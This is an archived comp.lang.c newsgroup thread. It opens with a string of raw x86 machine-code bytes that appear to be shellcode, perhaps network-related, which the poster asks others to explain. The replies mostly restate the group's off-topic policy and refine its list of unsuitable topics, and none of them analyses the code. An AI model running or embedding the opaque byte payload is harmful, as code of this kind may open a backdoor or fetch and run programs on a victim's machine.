"\x8B\x83\xAB\x01\x00\x00\x40\x89\x83\xAB\x01\x00\x00\x3D\x05\x00"
"\x00\x00\x0F\x84\x05\x00\x00\x00\xE9\x42\xFF\xFF\xFF\xC3\x68\x00"
"\x00\x00\x00\x68\x04\x00\x00\x00\x8D\x93\x87\x01\x00\x00\x52\x8B"
"\x93\xF8\x00\x00\x00\x52\x3E\xFF\x53\x4D\x3D\x01\x00\x00\x00\x0F"
"\x8C\xB0\xFF\xFF\xFF\xC3\x57\x56\x8B\xBB\x87\x01\x00\x00\x8B\xB3"
"\x8B\x01\x00\x00\x39\xF7\x5E\x5F\x0F\x84\x32\x00\x00\x00\x68\x00"
"\x00\x00\x00\x68\x00\x10\x00\x00\x8B\x93\x60\x01\x00\x00\x52\x8B"
"\x93\xF8\x00\x00\x00\x52\x3E\xFF\x53\x4D\x3D\x01\x00\x00\x00\x0F"
"\x8C\x70\xFF\xFF\xFF\x01\x83\x8B\x01\x00\x00\xE9\x50\x00\x00\x00"
"\xE8\x6E\x00\x00\x00\x50\x8B\x83\xF8\x00\x00\x00\x50\x3E\xFF\x53"
"\x55\x58\xC3\x89\xC7\x50\x3E\xFF\x93\x97\x00\x00\x00\x5F\x50\x57"
"\x68\x00\x00\x00\x00\x50\x3E\xFF\x93\x93\x00\x00\x00\x5F\x5F\x5F"
"\x58\xC3\x8D\x93\x64\x01\x00\x00\x52\x8D\x93\x6C\x01\x00\x00\x52"
"\x3E\xFF\x93\x87\x00\x00\x00\x5F\x5F\x89\x83\x68\x01\x00\x00\xC3"
"\xFF\xB3\x68\x01\x00\x00\x50\x68\x01\x00\x00\x00\x8B\x93\x60\x01"
"\x00\x00\x52\x3E\xFF\x93\x8F\x00\x00\x00\x5F\x5F\x5F\x5F\xE9\x43"
"\xFF\xFF\xFF\x8B\x93\x68\x01\x00\x00\x52\x3E\xFF\x93\x8B\x00\x00"
"\x00\x5F\xC3\x50\x8D\x83\x0C\x01\x00\x00\x50\x8D\x83\x1C\x01\x00"
"\x00\x50\x68\x00\x00\x00\x00\x68\x00\x00\x00\x00\x68\x28\x00\x00"
"\x00\x68\x00\x00\x00\x00\x68\x00\x00\x00\x00\x68\x00\x00\x00\x00"
"\x8D\x83\x6C\x01\x00\x00\x50\x68\x00\x00\x00\x00\x3E\xFF\x93\xEC"
"\x00\x00\x00\x58\xC3\xE8\xA9\xFF\xFF\xFF\x68\x00\x00\x00\x00\xFF"
"\x93\xE8\x00\x00\x00\x90";

Ben Pfaff · Mar 2, 2006

I have a asm code, I suspect it sort of socket programming. Can anyone
here give some instructions on how to determine the function or give
the psudo-code in C?

Your question is outside the domain of comp.lang.c, which discusses
only the standard C programming language, including the standard C
library. This is a remarkably narrow topic compared to what many
people expect.

For your convenience, the list below contains topics that are not
on-topic for comp.lang.c, and suggests newsgroups for you to explore
if you have questions about these topics. Please do observe proper
netiquette before posting to any of these newsgroups. In particular,
you should read the group's charter and FAQ, if any (FAQs are
available from www.faqs.org and other sources). If those fail to
answer your question then you should browse through at least two weeks
of recent articles to make sure that your question has not already
been answered.

* OS-specific questions, such as how to clear the screen,
access the network, list the files in a directory, or read
"piped" output from a subprocess. These questions should be
directed to OS-specific newsgroups, such as
comp.os.ms-windows.programmer.misc, comp.unix.programmer, or
comp.os.linux.development.apps.

* Compiler-specific questions, such as installation issues and
locations of header files. Ask about these in
compiler-specific newsgroups, such as gnu.gcc.help or
comp.os.ms-windows.programmer.misc. Questions about writing
compilers are appropriate in comp.compilers.

* Processor-specific questions, such as questions about
assembly and machine code. x86 questions are appropriate in
comp.lang.asm.x86, embedded system processor questions may
be appropriate in comp.arch.embedded.

* ABI-specific questions, such as how to interface assembly
code to C. These questions are both processor- and
OS-specific and should typically be asked in OS-specific
newsgroups.

* Algorithms, except questions about C implementations of
algorithms. "How do I implement algorithm X in C?" is not a
question about a C implementation of an algorithm, it is a
request for source code. Newsgroups comp.programming and
comp.theory may be appropriate.

* Making C interoperate with other languages. C has no
facilities for such interoperation. These questions should
be directed to system- or compiler-specific newsgroups. C++
has features for interoperating with C, so consider
comp.lang.c++ for such questions.

* The C standard, as opposed to standard C. Questions about
the C standard are best asked in comp.std.c.

* C++. Please do not post or cross-post questions about C++
to comp.lang.c. Ask C++ questions in C++ newsgroups, such
as comp.lang.c++ or comp.lang.c++.moderated.

* Test posts. Please test in a newsgroup meant for testing,
such as alt.test.

news.groups.questions is a good place to ask about the appropriate
newsgroup for a given topic.

Dan Henry · Mar 3, 2006

I have a asm code, I suspect it sort of socket programming.

Oh, most definitely. It's so obvious, I'm a little surprised you had
to ask.

Neil · Mar 3, 2006

Ok it is off topic.

But the answer is no. Your chances are close to zero. The original
author might know. Unless it is a HLL, then he would not either.

John Tsiombikas (Nuclear / Mindlapse) · Mar 3, 2006

Ok it is off topic.

But the answer is no. Your chances are close to zero. The original
author might know. Unless it is a HLL, then he would not either.

What is off-topic ?
Please provide some context in your replies by quoting from the message
you reply to, so that we can understand what you are talking about.

Arndt Jonasson · Mar 3, 2006

Ben Pfaff said:
Your question is outside the domain of comp.lang.c, which discusses
only the standard C programming language, including the standard C
library. This is a remarkably narrow topic compared to what many
people expect.

For your convenience, the list below contains topics that are not
on-topic for comp.lang.c, and suggests newsgroups for you to explore
if you have questions about these topics. Please do observe proper
netiquette before posting to any of these newsgroups. In particular,
you should read the group's charter and FAQ, if any (FAQs are
available from www.faqs.org and other sources). If those fail to
answer your question then you should browse through at least two weeks
of recent articles to make sure that your question has not already
been answered.

* OS-specific questions, such as how to clear the screen,
access the network, list the files in a directory, or read
"piped" output from a subprocess. These questions should be
directed to OS-specific newsgroups, such as
comp.os.ms-windows.programmer.misc, comp.unix.programmer, or
comp.os.linux.development.apps.

* Compiler-specific questions, such as installation issues and
locations of header files. Ask about these in
compiler-specific newsgroups, such as gnu.gcc.help or
comp.os.ms-windows.programmer.misc. Questions about writing
compilers are appropriate in comp.compilers.

* Processor-specific questions, such as questions about
assembly and machine code. x86 questions are appropriate in
comp.lang.asm.x86, embedded system processor questions may
be appropriate in comp.arch.embedded.

* ABI-specific questions, such as how to interface assembly
code to C. These questions are both processor- and
OS-specific and should typically be asked in OS-specific
newsgroups.

* Algorithms, except questions about C implementations of
algorithms. "How do I implement algorithm X in C?" is not a
question about a C implementation of an algorithm, it is a
request for source code. Newsgroups comp.programming and
comp.theory may be appropriate.

* Making C interoperate with other languages. C has no
facilities for such interoperation. These questions should
be directed to system- or compiler-specific newsgroups. C++
has features for interoperating with C, so consider
comp.lang.c++ for such questions.

* The C standard, as opposed to standard C. Questions about
the C standard are best asked in comp.std.c.

* C++. Please do not post or cross-post questions about C++
to comp.lang.c. Ask C++ questions in C++ newsgroups, such
as comp.lang.c++ or comp.lang.c++.moderated.

* Test posts. Please test in a newsgroup meant for testing,
such as alt.test.

news.groups.questions is a good place to ask about the appropriate
newsgroup for a given topic.

One more entry for the list:

* Configuring your C development environment. For example: choosing or
managing profiling tools, debuggers, code coverage tools; making your
editor display or lay out source code the way you want it; adding
editor commands for easier manipulation of source code.

(You can probably phrase this better.)

Neil · Mar 4, 2006

John said:
What is off-topic ?
Please provide some context in your replies by quoting from the message
you reply to, so that we can understand what you are talking about.

Sorry It was several pages of what appeared to be X86 asm from a
disassembler.

Ben Pfaff · Mar 4, 2006

Arndt Jonasson said:
One more entry for the list:

* Configuring your C development environment. For example: choosing or
managing profiling tools, debuggers, code coverage tools; making your
editor display or lay out source code the way you want it; adding
editor commands for easier manipulation of source code.

(You can probably phrase this better.)

Thanks. I merged most of this into another paragraph:

* Compiler-specific questions, such as installation issues,
locations of header files, configuring your C development
environment, or choosing or managing profiling tools,
debuggers, or code coverage tools. Ask about these in
compiler-specific newsgroups, such as gnu.gcc.help or
comp.os.ms-windows.programmer.misc. Questions about writing
compilers are appropriate in comp.compilers.

How to multiply two matrices of size in using inline assembly in C++	2	Mar 3, 2024
Porting a c program	11	May 9, 2009
How do ensure atomic update of a shared global in a multi-threadedapplication?	7	Mar 16, 2011
my getline is better than yours	15	Nov 12, 2007
How this function call works???	30	Jul 31, 2003
Mapping C code to assembly instructions	4	Jan 18, 2005
[alt.lang.asm,comp.lang.c]assembly Vs C Language	22	Nov 30, 2006
the C language lack for keyboard input functions	10	Sep 13, 2006

Anyone can give some instructions on the function of this asm?

changs

Ben Pfaff

Dan Henry

Neil

John Tsiombikas (Nuclear / Mindlapse)

Arndt Jonasson

Neil

Ben Pfaff

Ask a Question

Similar Threads

Members online

Forum statistics

Latest Threads